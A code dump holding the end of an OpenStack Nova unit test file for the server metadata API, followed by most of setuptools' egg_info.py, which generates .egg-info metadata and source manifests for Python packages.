self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request('/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request('/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key6')
def test_create(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.uuid, body=body)
body['metadata'].update({
"key1": "value1",
"key2": "value2",
"key3": "value3",
})
self.assertEqual(body, res_dict)
def test_create_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=None)
def test_create_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_item_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"metadata": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.create,
req, self.uuid, body=body)
def test_create_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"metadata": ['asdf']}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=body)
def test_create_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request()
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.uuid, body=body)
def test_update_metadata(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
response = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, response)
def test_update_all(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, body=expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_body_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=None)
def test_update_all_with_non_dict_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=body)
def test_update_all_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=expected)
def test_update_all_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=expected)
def test_update_all_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
req = self._get_request()
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body=body)
def test_update_all_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'PUT'
body = {"metadata": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex, self.controller.update_all,
req, self.uuid, body=body)
def test_update_item(self):
self.stubs.Set(objects.Instance, 'save', fake_instance_save)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.uuid, 'key1', body=body)
expected = {"meta": {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.uuid, 'key1',
body=body)
def test_update_item_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=None)
def test_update_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=expected)
def test_update_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=expected)
def test_update_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, '',
body=body)
def test_update_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.update,
req, self.uuid, ("a" * 260), body=body)
def test_update_item_value_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex_large,
self.controller.update,
req, self.uuid, "key1", body=body)
def test_update_item_too_many_keys(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'key1',
body=body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'bad',
body=body)
def test_update_item_non_dict(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request('/bad')
req.method = 'PUT'
body = {"meta": None}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'bad',
body=body)
def test_update_empty_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
req.headers["content-type"] = "application/json"
self.assertRaises(self.validation_ex,
self.controller.update, req, self.uuid, 'bad',
body=expected)
def test_too_many_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'POST'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden,
self.controller.create, req, self.uuid, body=data)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.headers["content-type"] = "application/json"
# test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.create, req, self.uuid, body=data)
# test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.create, req, self.uuid, body=data)
# test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex,
self.controller.create, req, self.uuid, body=data)
def test_too_many_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPForbidden, self.controller.update_all,
req, self.uuid, body=data)
def test_invalid_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = self._get_request()
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
# test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.update_all, req, self.uuid,
body=data)
# test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex_large,
self.controller.update_all, req, self.uuid,
body=data)
# test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(self.validation_ex,
self.controller.update_all, req, self.uuid,
body=data)
class ServerMetaDataTestV2(ServerMetaDataTestV21):
validation_ex = webob.exc.HTTPBadRequest
validation_ex_large = webob.exc.HTTPRequestEntityTooLarge
def _set_up_resources(self):
self.controller = server_metadata_v2.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequest.blank(self.url + param_url)
class BadStateServerMetaDataTestV21(test.TestCase):
def setUp(self):
super(BadStateServerMetaDataTestV21, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self.stubs.Set(nova.db, 'instance_get', self._return_server_in_build)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
self._return_server_in_build_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
self._set_up_resources()
def _set_up_resources(self):
self.controller = server_metadata_v21.ServerMetadataController()
self.uuid = str(uuid.uuid4())
self.url = '/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequestV3.blank(self.url + param_url)
def test_invalid_state_on_delete(self):
req = self._get_request('/key2')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, self.uuid, 'key2')
def test_invalid_state_on_update_metadata(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, body=expected)
def _return_server_in_build(self, context, server_id,
columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
def _return_server_in_build_by_uuid(self, context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
@mock.patch.object(nova.compute.api.API, 'update_instance_metadata',
side_effect=exception.InstanceIsLocked(instance_uuid=0))
def test_instance_lock_update_metadata(self, mock_update):
req = self._get_request()
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'keydummy': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, body=expected)
class BadStateServerMetaDataTestV2(BadStateServerMetaDataTestV21):
def _set_up_resources(self):
self.controller = server_metadata_v2.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequest.blank(self.url + param_url)
class ServerMetaPolicyEnforcementV21(test.NoDBTestCase):
def setUp(self):
super(ServerMetaPolicyEnforcementV21, self).setUp()
self.controller = server_metadata_v21.ServerMetadataController()
self.req = fakes.HTTPRequest.blank('')
def test_create_policy_failed(self):
rule_name = "os_compute_api:server-metadata:create"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.create, self.req, fakes.FAKE_UUID,
body={'metadata': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_index_policy_failed(self):
rule_name = "os_compute_api:server-metadata:index"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.index, self.req, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_update_policy_failed(self):
rule_name = "os_compute_api:server-metadata:update"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.update, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID,
body={'meta': {'fake_meta': 'fake_meta'}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_update_all_policy_failed(self):
rule_name = "os_compute_api:server-metadata:update_all"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.update_all, self.req, fakes.FAKE_UUID,
body={'metadata': {}})
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_delete_policy_failed(self):
rule_name = "os_compute_api:server-metadata:delete"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.delete, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
def test_show_policy_failed(self):
rule_name = "os_compute_api:server-metadata:show"
self.policy.set_rules({rule_name: "project:non_fake"})
exc = self.assertRaises(
exception.PolicyNotAuthorized,
self.controller.show, self.req, fakes.FAKE_UUID, fakes.FAKE_UUID)
self.assertEqual(
"Policy doesn't allow %s to be performed." % rule_name,
exc.format_message())
|
ForgottenKahz/CloudOPC
|
refs/heads/master
|
venv/Lib/site-packages/setuptools/command/egg_info.py
|
100
|
"""setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
from distutils.filelist import FileList as _FileList
from distutils.util import convert_path
from distutils import log
import distutils.errors
import distutils.filelist
import os
import re
import sys
try:
from setuptools_svn import svn_utils
except ImportError:
pass
from setuptools import Command
from setuptools.command.sdist import sdist
from setuptools.compat import basestring, PY3, StringIO
from setuptools.command.sdist import walk_revctrl
from pkg_resources import (
parse_requirements, safe_name, parse_version,
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename)
import setuptools.unicode_utils as unicode_utils
from pkg_resources import packaging
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setuptools.command.setopt import edit_config
values = dict(
egg_info=dict(
tag_svn_revision=0,
tag_date=0,
tag_build=self.tags(),
)
)
edit_config(filename, values)
def finalize_options(self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
parsed_version = parse_version(self.egg_version)
try:
is_version = isinstance(parsed_version, packaging.version.Version)
spec = (
"%s==%s" if is_version else "%s===%s"
)
list(
parse_requirements(spec % (self.egg_name, self.egg_version))
)
except ValueError:
raise distutils.errors.DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name, self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('', os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name) + '.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name:
self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key == self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
        ``delete_file(filename)``. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if PY3:
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info, ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
version = ''
if self.tag_build:
version += self.tag_build
if self.tag_svn_revision:
rev = self.get_svn_revision()
            if rev != "0":  # "0" means it's not an svn working copy
version += '-r%s' % rev
if self.tag_date:
import time
version += time.strftime("-%Y%m%d")
return version
@staticmethod
def get_svn_revision():
if 'svn_utils' not in globals():
return "0"
return str(svn_utils.SvnInfo.load(os.curdir).get_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info, "SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name + '.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-" * 78 + '\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n' + '-' * 78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
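# --- Illustrative sketch (not part of setuptools; the helper name is
# hypothetical) ---
# Standalone version of the suffix logic in egg_info.tags() above: an
# explicit build tag, then an optional svn revision, then an optional
# date stamp. E.g. tag_build='.dev' with tag_date on a 2005-05-28 build
# yields '.dev-20050528', which tagged_version() appends to the version.
def _demo_tags(tag_build=None, svn_revision="0", tag_date=False):
    import time
    version = ''
    if tag_build:
        version += tag_build
    if svn_revision != "0":  # "0" means not an svn working copy
        version += '-r%s' % svn_revision
    if tag_date:
        version += time.strftime("-%Y%m%d")
    return version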
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if self._safe_path(path):
self.files.append(path)
def extend(self, paths):
self.files.extend(filter(self._safe_path, paths))
def _repair(self):
"""
Replace self.files with only safe paths
Because some owners of FileList manipulate the underlying
``files`` attribute directly, this method must be called to
repair those paths.
"""
self.files = list(filter(self._safe_path, self.files))
def _safe_path(self, path):
enc_warn = "'%s' not %s encodable -- skipping"
        # To avoid accidental transcoding errors, decode to unicode first
u_path = unicode_utils.filesys_decode(path)
if u_path is None:
log.warn("'%s' in unexpected encoding -- skipping" % path)
return False
# Must ensure utf-8 encodability
utf8_path = unicode_utils.try_encode(u_path, "utf-8")
if utf8_path is None:
log.warn(enc_warn, path, 'utf-8')
return False
try:
            # accept the path if either representation exists on disk
if os.path.exists(u_path) or os.path.exists(utf8_path):
return True
        # os.path.exists() may raise while encoding u_path for the OS
except UnicodeEncodeError:
log.warn(enc_warn, path, sys.getfilesystemencoding())
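# --- Illustrative sketch (not part of setuptools; the helper name is
# hypothetical) ---
# The gist of FileList._safe_path() above, using only the standard
# library: keep a path only if it decodes with the filesystem encoding
# and re-encodes cleanly as utf-8.
def _demo_safe_path(path):
    if isinstance(path, bytes):
        try:
            path = path.decode(sys.getfilesystemencoding())
        except UnicodeDecodeError:
            return False  # not decodable -- skip
    try:
        path.encode('utf-8')
    except UnicodeEncodeError:
        return False  # not utf-8 encodable -- skip
    return True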
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options(self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def _manifest_normalize(self, path):
path = unicode_utils.filesys_decode(path)
return path.replace(os.sep, '/')
def write_manifest(self):
"""
Write the file list in 'self.filelist' to the manifest file
named by 'self.manifest'.
"""
self.filelist._repair()
        # _repair() has filtered the list down to encodable paths; now
        # normalize them to unicode with posix separators for the manifest
files = [self._manifest_normalize(f) for f in self.filelist.files]
msg = "writing manifest file '%s'" % self.manifest
self.execute(write_file, (self.manifest, files), msg)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self._add_egg_info(cmd=ei_cmd)
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def _add_egg_info(self, cmd):
"""
Add paths for egg-info files for an external egg-base.
The egg-info files are written to egg-base. If egg-base is
outside the current working directory, this method
        searches the egg-base directory for files to include
in the manifest. Uses distutils.filelist.findall (which is
really the version monkeypatched in by setuptools/__init__.py)
to perform the search.
Since findall records relative paths, prefix the returned
paths with cmd.egg_base, so add_default's include_pattern call
(which is looking for the absolute cmd.egg_info) will match
them.
"""
if cmd.egg_base == os.curdir:
# egg-info files were already added by something else
return
discovered = distutils.filelist.findall(cmd.egg_base)
resolved = (os.path.join(cmd.egg_base, path) for path in discovered)
self.filelist.allfiles.extend(resolved)
def prune_file_list(self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(r'(^|' + sep + r')(RCS|CVS|\.svn)' + sep,
is_regex=1)
def write_file(filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
    # assuming the contents have been vetted for utf-8 encoding
contents = contents.encode("utf-8")
with open(filename, "wb") as f: # always write POSIX-style manifest
f.write(contents)
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution, 'zip_safe', None)
from setuptools.command import bdist_egg
bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def _write_requirements(stream, reqs):
lines = yield_lines(reqs or ())
append_cr = lambda line: line + '\n'
lines = map(append_cr, lines)
stream.writelines(lines)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = StringIO()
_write_requirements(data, dist.install_requires)
extras_require = dist.extras_require or {}
for extra in sorted(extras_require):
data.write('\n[{extra}]\n'.format(**vars()))
_write_requirements(data, extras_require[extra])
cmd.write_or_delete_file("requirements", filename, data.getvalue())
def write_setup_requirements(cmd, basename, filename):
data = StringIO()
_write_requirements(data, cmd.distribution.setup_requires)
cmd.write_or_delete_file("setup-requirements", filename, data.getvalue())
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[
k.split('.', 1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(sorted(pkgs)) + '\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value) + '\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
